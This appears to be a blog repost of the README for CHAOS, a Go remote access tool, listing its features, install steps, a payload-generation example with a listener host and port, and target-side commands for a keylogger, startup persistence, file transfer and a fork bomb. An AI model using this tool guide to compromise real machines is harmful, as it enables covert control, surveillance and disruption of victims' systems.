CHAOS is a PoC that allow generate payloads and control remote operating systems.
Features
| Feature | Windows | Mac | Linux |
|---|---|---|---|
Reverse Shell | X | X | X |
Download File | X | X | X |
Upload File | X | X | X |
Screenshot | X | X | X |
Keylogger | X | ||
Persistence | X | ||
Open URL | X | X | X |
Get OS Info | X | X | X |
Fork Bomb | X | X | X |
Run Hidden | X |
Also Read – Osmedeus : Fully Automated Offensive Security Tool for Reconnaissance & Vulnerability Scanning
How to Install
Install dependencies
$ sudo apt install golang git -y
Get this repository
$ go get github.com/tiagorlampert/CHAOS
Get external golang dependencies (ARE REQUIRED GET ALL DEPENDENCIES)
$ go get github.com/kbinani/screenshot
$ go get github.com/lxn/win
$ go get github.com/matishsiao/goInfo
$ go get golang.org/x/sys/windows
Maybe you will see the message “package github.com/lxn/win: build constraints exclude all Go files”.
It’s occurs because the libraries are to windows systems, but it necessary to build the payload.
Go into the repository
$ cd ~/go/src/github.com/tiagorlampert/CHAOS
Run
$ go run main.go
How to Use?
| Command | On HOST does… |
|---|---|
generate | Generate a payload (e.g. generate lhost=192.168.0.100 lport=8080 fname=chaos --windows) |
lhost= | Specify a ip for connection |
lport= | Specify a port for connection |
fname= | Specify a filename to output |
--windows | Target Windows |
--macos | Target Mac OS |
--linux | Target Linux |
listen | Listen for a new connection (e.g. listen lport=8080) |
serve | Serve files |
exit | Quit this program |
| Command | On TARGET does… |
|---|---|
download | File Download |
upload | File Upload |
screenshot | Take a Screenshot |
keylogger_start | Start Keylogger session |
keylogger_show | Show Keylogger session logs |
persistence_enable | Install at Startup |
persistence_disable | Remove from Startup |
getos | Get OS name |
lockscreen | Lock the OS screen |
openurl | Open the URL informed |
bomb | Run Fork Bomb |
clear | Clear the Screen |
back | Close connection but keep running on target |
exit | Close connection and exit on target |
Demo Video
Disclaimer
THIS SOFTWARE IS PROVIDED “AS IS” WITHOUT WARRANTY OF ANY KIND. YOU MAY USE THIS SOFTWARE AT YOUR OWN RISK. THE USE IS COMPLETE RESPONSIBILITY OF THE END-USER. THE DEVELOPERS ASSUME NO LIABILITY AND ARE NOT RESPONSIBLE FOR ANY MISUSE OR DAMAGE CAUSED BY THIS PROGRAM.
Pystinger is a Python-based tool that enables SOCKS4 proxying and port mapping through webshells. It…
Introduction When it comes to cybersecurity, speed and privacy are critical. Public vulnerability databases like…
Introduction When it comes to cybersecurity, speed and privacy are critical. Public vulnerability databases like…
If you are working with Linux or writing bash scripts, one of the most common…
What is a bash case statement? A bash case statement is a way to control…
Why Do We Check Files in Bash? When writing a Bash script, you often work…